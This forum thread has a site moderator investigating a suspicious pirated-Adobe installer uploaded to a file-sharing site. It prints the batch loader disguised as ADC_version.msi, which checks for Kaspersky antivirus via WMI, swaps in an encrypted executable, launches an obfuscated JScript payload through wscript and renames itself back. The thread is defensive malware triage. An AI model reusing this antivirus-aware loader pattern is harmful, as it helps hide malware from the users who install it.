*.msi file gets renamed to *.bat, *.js file hijacks wscript?

June 27, 2020 at 03:10:42
Specs: Windows 10
Hi! I'm a moderator on a site where people can upload and share programs. We are trying to keep our site clean of malicious infection on the apps, but some of the programs that are being uploaded by a user receive some feedback about infection. I'm a bit worried by this uploader. He uploads many good programs. But he gets some complaints from users who download hes apps. They explain that abnormal things happen after installing these apps on their systems. So I've downloaded some of his apps to analyze them in Hybrid Analysis, and I see strange activities.

I downloaded one of his programs which in this case is Adobe collection, I scanned the Set-up.exe with Hybrid-Analysis: https://www.hybrid-analysis.com/sam...

I noticed this: https://i.ibb.co/t2Dfzhp/bscr.png

Then I tried to find ADC_version.msi and I changed the file extension to ADC_version.bat and opened bat file with linux.

message edited by hawk9


See More: *.msi file gets renamed to *.bat, *.js file hijacks wscript?

Reply ↓  Report •

#1
June 27, 2020 at 03:12:36
When i opened ADC_version.bat i get this code:

��&cls
@echo off
cd ../../products
setlocal enableDelayedExpansion enableextensions
set LIST=
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F


set "regexp=.*kasper.*"

echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (

move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
start ../Set-up.exe

echo " "


) || (

echo " "
cd ../
move Set-up.exe products/AdobePhotoshop21-Core_x64.data
timeout 1 nul 2>&1
cd packages/ADC
if exist ADC (
cd ../../products
move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
timeout 1 nul 2>&1
start ../Set-up.exe
cd ../packages/ADC
start wscript //E:jscript ADC %1
) else (
echo "Error : Please Extract compressed file first ..."
pause
)
)

rename ADC_version.bat ADC_version.msi

message edited by hawk9


Reply ↓  Report •

#2
June 27, 2020 at 04:26:57
I must admit this is as far my skill set goes...

The AdobePhotoshop21-Core_x64.dat is a 5.22 mb size file thats encrypted no matter programs i use to open it. I noticed the ADC file running through wscript in batch script.

Some of the members on our site has complained aboute this javascript (ADC) file hijacking the wscript running a spyware/keylogger or somthing malicious. So I was able to find the ADC file but when i opened that it was all unreadable, compressed, so i copyd the text in online decompressing (https://www.generateit.net/javascript-decompressor/). It got readable but still encrypted a user on this site told me.

Here is the decompressed ADC file: https://pastebin.com/sTjecBHE

Im not expecting someone going through that code, im just looking for some guidance how to continiue investigation to get some proof to ban this user PERMANENTLY (if its a malicious act).

Help from this comunity will be very mutch apreciated by me and all of the members on our site. Thank you


Reply ↓  Report •

#3
June 27, 2020 at 19:41:59
It is clear from the Hybrid-Analysis that there is malicious attempt in the setup.
Is it not possible to run that scan on your web site after user uploaded the app? maybe e add the analysis result for others to see and decide?

Reply ↓  Report •

Related Solutions

#4
June 28, 2020 at 08:59:20
@sluc thanx for your view. I'v compared different setups of same adobes versions, and this one does shows other results than the others include this renaming of file extension (msi to bat), and this ADC.js code possibly hijacks wscript running its js code in background. I have analysed this for weeks asking around, but i havent found anoyone yet that could determine if this ADC.js file has malicious intend or not. Its a pretty long code and possible encrypted so thats why. My skills stops at this js script and thats why i need help with it.

Reply ↓  Report •

Ask Question